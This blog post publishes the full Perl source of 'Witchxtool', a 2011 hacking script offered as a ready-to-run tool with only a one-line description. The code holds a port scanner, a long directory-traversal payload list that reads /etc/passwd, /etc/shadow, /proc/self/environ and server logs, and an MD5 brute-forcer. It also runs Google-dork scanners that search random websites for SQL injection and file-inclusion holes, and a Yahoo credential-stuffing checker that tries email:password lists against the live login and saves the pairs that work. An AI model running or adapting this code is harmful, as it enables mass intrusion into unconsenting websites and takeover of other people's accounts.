PERL [ Witchxtool : Port-LFI-SQL-Scanner-And-MD5-Bruteforcing-Tool ] - Intech Network

Ethical-Hacking & penetration testing & network security assessments

11/20/2018

PERL [ Witchxtool : Port-LFI-SQL-Scanner-And-MD5-Bruteforcing-Tool ]





 Witchxtool is a perl script that consists of a port scanner, LFI scanner, MD5 bruteforcer, dork SQL injection scanner, fresh proxy scanner, and a dork LFI scanner.

 

CODE : 

#
#        .__  __         .__              __                .__  
#__  _  _|__|/  |_  ____ |  |__ ___  ____/  |_  ____   ____ |  | 
#\ \/ \/ /  \   __\/ ___\|  |  \\  \/  /\   __\/  _ \ /  _ \|  | 
# \     /|  ||  | \  \___|   Y  \>    <  |  | (  <_> |  <_> )  |__
#  \/\_/ |__||__|  \___  >___|  /__/\_ \ |__|  \____/ \____/|____/ V.1.1
#                      \/     \/      \/
#Author : th3_w1tch (th3_w1tch <at> coconutstmik.com)
#Home   : http://makassarhacker.com
#         http://th3w1tch.wordpress.com
#         http://coconutstmik.com
#Thanks For :
#Makassar Ethical Hacker Crew
#Oghie,d43ngcyb3r,C4V4LeR4,Gameover,Mrs.geena,k1n9cr0c0d1l3,4nt_bL4cK,4r3a_51,Meonkzt,jimmyromanticdevil
#biohaz4rds,Dr.Crash,hitamputihku,p4rcomx.
#COCONUT Computer Club STMIK Profesional & Enigma Group
#!/usr/bin/perl
use IO::Socket::INET;
use Net::RawIP;
use HTTP::Request;
use LWP::UserAgent;
use Term::ANSIColor;
use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;
use LWP::Simple;
use Getopt::Std;
use WWW::Mechanize;
use Data::Validate::IP;
use HTTP::Cookies;
system (clear);
header();
sub header{
  print color "bold yellow";
  print q(
##############################################################################
#                Witchxtool Ver.1.1 | Makassar Ethical Hacker                #
#                  http://makassarhacker.com                      #
##############################################################################
#                             Program Menu                             #
#----------------------------------------------------------------------------#
#  1. Port Scanner       4. Dork SQLI Scanner      7. Yahoo Password Checker  #
#  2. LFI Scanner       5. Proxy Fresh Scanner      8. Help                    #
#  3. MD5 Brute Force     6. Dork LFI Scanner                                 #
#----------------------------------------------------------------------------#
##############################################################################
#                            Coding By th3_w1tch                             #
#                        http://th3w1tch.wordpress.com                     #
#                               MEH Project 2011                             #
##############################################################################
  );
  print colored ['red'], "                         Insert Program Number : ";
  $number=<STDIN>;
  if ($number==1){
    portscanner();
    print colored ['white'],"Back to Menu Press ";
    print colored ['yellow on_white'], " Enter";
    $back=<>;
    system (clear);
    header();
  }
  if ($number==2){
    lfiscanner();
    print colored ['white'],"Back to Menu Press ";
    print colored ['yellow on_white'], " Enter";
    $back=<>;
    system (clear);
    header();
  }
if ($number==3){
    md5brute();
    print colored ['white'],"Back to Menu Press ";
    print colored ['bold white on_red'], " Enter";
    $back=<>;
    system (clear);
    header();
  }
if ($number==4){
    sqli();
    print colored ['white'],"Back to Menu Press ";
    print colored ['bold white on_red'], " Enter";
    $back=<>;
    system (clear);
    header();
  }
if ($number==5){
    proxy();
    print colored ['white'],"Back to Menu Press ";
    print colored ['bold black on_white'], " Enter";
    $back=<>;
    system (clear);
    header();
  }
if ($number==6){
    lfidork();
    print colored ['white'],"Back to Menu Press ";
    print colored ['bold black on_white'], " Enter";
    $back=<>;
    system (clear);
    header();
  }
if ($number==7){
    yahoopasschecker();
    print colored ['white'],"Back to Menu Press ";
    print colored ['bold black on_white'], " Enter";
    $back=<>;
    system (clear);
    header();
  }
if ($number==8){
    help();
    print colored ['white'],"Back to Menu Press ";
    print colored ['bold black on_white'], " Enter";
    $back=<>;
    system (clear);
    header();
  }
}

sub portscanner{
  system (clear);
  print color 'reset';
  print color "green";
  print q(
###############################################################
#                Port Scanner                    #
#        http://makassarhacker.com                   #
###############################################################
#             usage -> Target : 192.168.1.1              #   
#-------------------------------------------------------------#
###############################################################);
  print "\n";
  print "Target: ";
  $target = <STDIN>;
  chomp ($target);
  $port = 1;
  while($port <= 65535){
    $ports = new IO::Socket::INET (
    PeerAddr => $target,
    PeerPort => $port,
    Proto => "tcp");
    if($ports){print "Open -> $port\n";}
    $port++;
  }
}

sub lfiscanner{
  system (clear);
  print color 'reset';
  print color "green";
  print q(
###############################################################
#                LFI Scanner                    #
#        http://makassarhacker.com                   #
###############################################################
#      usage -> Target : http://site.com/index.php?page=      #   
#-------------------------------------------------------------#
###############################################################);
  print "\n";
  print "Target :";
  chomp($target = <STDIN>);
  if($target !~ /http:\/\//) { $target = "http://$target"; }
  @lfi = ('/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../../proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../../proc/self/environ',
'/etc/shadow',
'/etc/group',
'/proc/self/environ',
'/etc/security/group',
'/etc/security/passwd',
'/etc/security/user',
'/etc/security/environ',
'/etc/security/limits',
'/usr/lib/security/mkuser.default',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access. log',
'/var/log/apache/access_log',
'/var/log/apache2/access_log',
'/var/log/apache/access.log',
'/var/log/apache2/access.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache2/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/error.log',
'/var/log/error_log',
'/var/log/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/usr/local/apache2/logs/access_log',
'/usr/local/apache2/logs/access.log',
'/usr/local/apache2/logs/error_log',
'/usr/local/apache2/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/access.log',
'/var/log/httpd/error_log',
'/var/log/httpd/error.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/access_log',
'/var/log/apache2/access.log',
'/var/log/apache2/error_log',
'/var/log/apache2/error.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/log/error_log',
'/var/log/error.log',
'/opt/lampp/logs/access_log',
'/opt/lampp/logs/error_log',
'/opt/xampp/logs/access_log',
'/opt/xampp/logs/error_log',
'/opt/lampp/logs/access.log',
'/opt/lampp/logs/error.log',
'/opt/xampp/logs/access.log',
'/opt/xampp/logs/error.log',
'/Program Files\Apache Group\Apache\logs\access.log',
'/Program Files\Apache Group\Apache\logs\error.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/access_log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/access_log',
'/var/log/error_log',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/access.log',
'../../../../../../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../../../../../var/log/httpd/access.log',
'../../../../../../../../../../../../../../../var/log/httpd/error.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/access.log',
'../../../../../../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../../../../../var/log/httpd/access.log',
'../../../../../../../../../../../../../../../var/log/httpd/error.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log');
  print "Searching . . .\n";
  foreach $scan(@lfi){
    $url = $target.$scan;
    $request = HTTP::Request->new(GET=>$url);
    $ua = LWP::UserAgent->new();
    $response = $ua->request($request);
    if ($response->is_success && $response->content =~ m/:x:/) {print $url, " -> Vulnerable\n";}
    elsif ($response->is_success && $response->content =~ m/"GET/) {print $url, " -> Vulnerable\n";}
    elsif ($response->is_success && $response->content =~ m/DOCUMENT_ROOT/) {print $url, " -> Vulnerable\n";}
    elsif ($response->is_success && $response->content =~ m/\[error\]/) {print $url, " -> Vulnerable\n";}
  }
}

sub md5brute{
  use Digest::MD5 qw(md5_hex);
  system (clear);
  print color 'reset';
  print color "green";
  print q(
###############################################################
#                 MD5 Brute Force                    #
#        http://makassarhacker.com                   #
###############################################################
#   usage -> Insert MD5 : 21232f297a57a5a743894a0e4a801fc3    #
#         Insert Type [k/B/a/c]: k                       #
#            Insert Min Length: 4                  #
#            Insert Max Length: 5                  #
#-------------------------------------------------------------#
###############################################################);
  print "\n";
  print "Insert MD5: ";
  $md5=<STDIN>;
  chomp($md5);
  print "Insert Type [k/B/a/c]: ";
  $type=<STDIN>;
  chomp($type);
  print "Insert Min Length: ";
  $k=<STDIN>;
  chomp($k);
  print "Insert Max Length: ";
  $p=<STDIN>;
  chomp($p);
  if ($type=~"k") {$char = "abcdefghijklmnopqrstuvwxyz";}
  if ($type=~"B") {$char = $char. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
  if ($type=~"a") {$char = $char."1234567890";}
  if ($type=~"c") {$char = $char. "!\"\$%&/()=?-.:\\*'-_:.;,";}
  sub cari{
    @tampung = ();
    $shift = shift;
    for ($i =0;$i<$shift;$i++){ $tampung[i] = 0;}
    do{
      for ($i =0;$i<$shift;$i++){
        if ($tampung[$i] > length($char)-1){
          if ($i==$shift-1){
            print color "red";
            print "Password Not Found\n";
            $a=0;
            return false;
          }
          $tampung[$i+1]++;
          $tampung[$i]=0;
        }
      }
      $pass = "";   
      for ($i =0;$i<$shift;$i++){ $pass = $pass . substr($char,$tampung[$i],1);}
      $enkripsi = md5_hex($pass);
      $a++;
      print "$pass -> $enkripsi -> $md5 \n";
      if ($md5 eq $enkripsi){
       print color "red";
       print "Password Cracked = $pass\n";
       print colored ['white'],"Back to Menu Press ";
       print colored ['bold white on_red'], " Enter";
       $back=<>;
       system (clear);
       header();
      }
      $tampung[0]++;
    }
    while($tampung[$shift-1]<length($char));
  }
  for ($x=$k;$x<=$p;$x++){
  cari($x);
  }
}

sub sqli{
  system (clear);
  print color 'reset';
  print color "green";
  print q(
###############################################################
#                Dork SQLI Scanner                        #
#        http://makassarhacker.com                   #
###############################################################
#            usage -> SQLI DORK : news.php?id=              #   
#-------------------------------------------------------------#
###############################################################);
print "\n";
print "SQLI Dork : ";
$dork=<STDIN>;
chomp($dork);
print "Scanning . . . \n";
print color 'reset';
for($start = 0;$start != 100*10;$start += 10)
{
    $t = "http://www.google.com/search?hl=fr&q=".$dork."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new;
    $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13");
    $response = $ua->get($t);
    if ($response->is_success)
    {
        $c = $response->content;
        @stuff = split(/<a href=/,$c);
        foreach $line(@stuff)
        {
            if($line =~/(.*) class=l/ig)
            {
                $out = $1;
                $out =~ s/"//g;
      $out =~s/$/\'/;
            
    $ua = LWP::UserAgent->new;
    $response = $ua->get($out);
            $error = $response->content();
            if($error =~m/SQL syntax/)
                {print "$out -> ";
                 print colored ['red'],"Vulnerable MySQL\n";}
                           
            elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
                {print "$out -> ";
                print colored ['red'],"Vulnerable MS Access\n";}
                               
            elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
                {print "$out -> ";
                 print colored ['red'],"Vulnerable MSSQL\n";}
               
            elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
                {print "$out -> ";
                 print colored ['red'],"Vulnerable Blind!\n";}
                           
            elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
                {print "$out -> ";
                 print colored ['red'],"Vulnerable Oracle!\n";}
               
            }
        }
        }
        }
}

sub proxy{
  system (clear);
  print color 'reset';
  print color "green";
  print q(
###############################################################
#                  Proxy Fresh Scanner                 #
#        http://makassarhacker.com                   #
###############################################################
#          Proxy Fresh From http://proxylist.net          #   
#-------------------------------------------------------------#
###############################################################);
print "\n";
print "                 Press Enter to Scanning";
$enter=<>;
print "Scanning. . . \n";
  my $proxy  = "http://www.proxylist.net/";
  my $module  = WWW::Mechanize->new();
  $module->get($proxy);
  my @links = $module->links();
  foreach my $link (@links){
    @url_str = split('/',$link->url());
    @ip_str = split(/:/,$url_str[2]);
    if(is_ipv4($ip_str[0])){
      print $ip_str[0].":".$ip_str[1]."\n";
    }
  }
}

sub lfidork{
  system (clear);
  print color 'reset';
  print color "green";
  print q(
###############################################################
#                    Dork LFI Scanner                 #
#         http://makassarhacker.com                   #
###############################################################
#     usage -> Dork : index.php?option=com_ckforms            #
#              Vuln LFI : option=com_ckforms&controller=      #   
#-------------------------------------------------------------#
###############################################################);
print "\n";
@lfi = (
'../../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../etc/passwd',
#'../../../../../../../../../../../../../../../proc/self/environ',
#'../../../../../../../../../../../../../../../proc/self/environ',
);
print "Dork : ";
$dork=<STDIN>;
chomp($dork);
print "Vuln LFI : ";
$inject=<STDIN>;
chomp($inject);
print "Scanning . . .\n";
for($start = 0;$start != 100*10;$start += 10)
{
    $t = "http://www.google.com/search?hl=fr&q=".$dork."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new;
    $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13");
    $response = $ua->get($t);
    if ($response->is_success)
    {
        $c = $response->content;
        @stuff = split(/<a href=/,$c);
        foreach $line(@stuff)
        {
            if($line =~/(.*) class=l/ig)
            {
                $out = $1;
                $out =~ s/"//g;
                $inj="/*.php?";
        foreach $scan(@lfi){
                $get=$out.$inj.$inject.$scan;
                $ua = LWP::UserAgent->new;
                $ua->timeout(10);
        $response = $ua->get($get);
                    $error = $response->content();
            #if($error =~ /DOCUMENT_ROOT=\// && $error =~ /HTTP_USER_AGENT/)
                #{print color 'reset';print "$get";  print colored ['red']," -> LFI Vulnerable\n"}
                        if ($error=~ /:x:/)
                {print color 'reset';print "$get";  print colored ['red']," -> LFI Vulnerable\n"}
           
               }
               
                 
            }
    }
     }
 }
print "Scan Finished\n";
}

sub yahoopasschecker{
system (clear);
print color 'reset';
print color "green";
print q(
###############################################################
#                 Yahoo Password Checker                      #
#                http://makassarhacker.com                    #
###############################################################
#     Insert your email and password list in a file check.txt #                                             
#     Format email:password -> abcdef@yahoo.com:123456        #
#-------------------------------------------------------------#
###############################################################
);
print "                   Press Enter to Start";
$enter=<>;
print "Check Login . . .\n";
open (MYFILE, 'check.txt');
while (<MYFILE>) {
 chomp;
 if($_ =~ m/[a-z0-9_\.]\@yahoo(.*?):(.+){6,32}$/i or $_ =~ m/[a-z0-9_\.]\@ymail(.*?):(.+){6,32}$/i or $_ =~ m/[a-z0-9_\.]\@rocketmail(.*?):(.+){6,32}$/i){
  @data = split(/:/, $_);
  $username=$data[0];
  $password=$data[1];
  $myCookies = HTTP::Cookies->new();
  my $ua = LWP::UserAgent->new;
  $ua->cookie_jar($myCookies);
  $ua->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13');
  my $url = ("https://login.yahoo.com/config/login?login=".$username."&passwd=".$password);
  my $login = $ua->get($url);
  if ($login->is_success){
   $respon = $login->content;
    if ($respon=~m/Invalid ID or password/){print $username,":",$password," -> Login Failed\n";}
    else {
     open (FILE, '>>success.txt');
     print FILE "$username",":","$password\n";
     close (FILE); 
     print $username,":",$password," -> Login Success\n";}
  }
 }
}
close (MYFILE);
}

sub help{
  system (clear);
  print color 'reset';
  print color "green";
  print q(
###############################################################
#                  HELP Witchxtool                       #
#        http://makassarhacker.com                   #
###############################################################
1. Port Scanner -> To know which port(1-65535) are open on the target
          usage -> Target : 192.168.1.1   
                   Open -> 53
                   Open -> 139
                   Open -> 445

2. LFI Scanner -> Find vulnerable local file inclusion on a website
         usage -> Target : http://site.com/index.php?page=

3. MD5 BruteForce -> Perform experiments on all keys that may be the result of the MD5 encryption
            usage ->  Insert MD5 : 21232f297a57a5a743894a0e4a801fc3
                                   admin = 21232f297a57a5a743894a0e4a801fc3
                      Insert Type [k/B/a/c]:kB
                      k= Lowarcase [a-z]
              B= Upper case [A-Z]
                      a= Number [0-9]
                      c= Character symbol [!"$%&/()=?-.:\*'-_:.;,"]
                      Insert Min Length : 4
                      Insert Max Length : 5
                     
4. Dork SQLI Scanner -> Searching of websites that are vulnerable SQL Injection randomly using google engine  according dork
               usage -> SQLI DORK : news.php?id=

5. Proxy Fresh Scanner -> Looking for a proxy by utilizing the site http://proxylist.net

6. Dork LFI Scanner -> Searching of websites that are vulnerable LFI (Local File Inclusion) randomly using google engine  according dork
              usage -> Dork : index.php?option=com_ckforms           
                       Vuln LFI : option=com_ckforms&controller=

7  Yahoo Password Checker -> Check the password account yahoo  with a large number.
                             Insert your email and password list in a file check.txt
                             Format email:password -> abcdef@yahoo.com:123456
   after the checking process is completed will form a success.txt file that contains the correct password  account yahoo
);
}
#Makassar Ethical Hacker Project 2011

Aucun commentaire:

Enregistrer un commentaire